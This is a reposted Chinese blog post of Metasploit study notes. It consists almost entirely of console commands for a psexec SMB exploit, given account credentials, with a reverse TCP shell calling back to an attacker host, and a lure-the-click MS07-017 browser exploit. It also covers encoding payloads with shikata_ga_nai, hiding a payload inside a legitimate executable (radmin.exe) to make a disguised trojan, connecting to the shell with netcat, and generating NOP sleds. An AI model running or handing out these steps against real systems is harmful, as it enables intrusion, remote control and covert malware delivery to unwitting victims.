msf学习笔记（2）

来源：互联网发布：php .net哪个好学编辑：程序博客网时间：2024/06/03 19:31

exploit分类

Active exploit

示例：

msf > use exploit/windows/smb/psexecmsf exploit(psexec) > set rhost 192.168.1.100rhost => 192.168.1.100msf exploit(psexec) > set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcpmsf exploit(psexec) > set lhost 192.168.1.1lhost => 192.168.1.1msf exploit(psexec) > set lport 4444lport => 4444msf exploit(psexec) > set smbuser user1 #需要客户机账户名smbuser => user1msf exploit(psexec) > set smbpass pass1 #需要客户机密码smbpass => pass1msf exploit(psexec) > exploit

Passive exploit

示例：

msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize      ##引导点击网址漏洞msf exploit(ms07_017_ani_loadimage_chunksize) > set srvhost 192.168.1.100srvhost => 192.168.1.100msf exploit(ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcpmsf exploit(ms07_017_ani_loadimage_chunksize) > set lhost 192.168.1.1lhost => 192.168.1.1msf exploit(ms07_017_ani_loadimage_chunksize) > set lport 4444lport => 4444msf exploit(ms07_017_ani_loadimage_chunksize) > exploit

生成payload

msf payload(shell_bind_tcp) > generate  #生成payload（RB语言）msf payload(shell_bind_tcp) > generate -b '\x00'        #过滤坏字符（编码方式）msf > show encoders     #显示编码方式msf payload(shell_bind_tcp) > generate -e php/base64        #手动指定编码方式

payload示例

msf payload(shell_bind_tcp) > generate -b  'x00' -t exe  -e x86/shikata_ga_nai -i 5 -k -x /user/share/windows-binaries/radmin.exe -f  /root/1.exe#-b 排除坏字符#-t 生成文件类型#-e 使用编码方式#-i 编码次数#-k 隐蔽运营#-x 使用正常文件模板（正常运行程序）#-f 输出文件

控制机

nc 192.168.1.100 4444

NOP（字节滑动）
no-operation / Next Operation（无任何操作）

generate -s 14  #插入14个NOPgenerate -t c   #C语言格式

阅读全文

0 0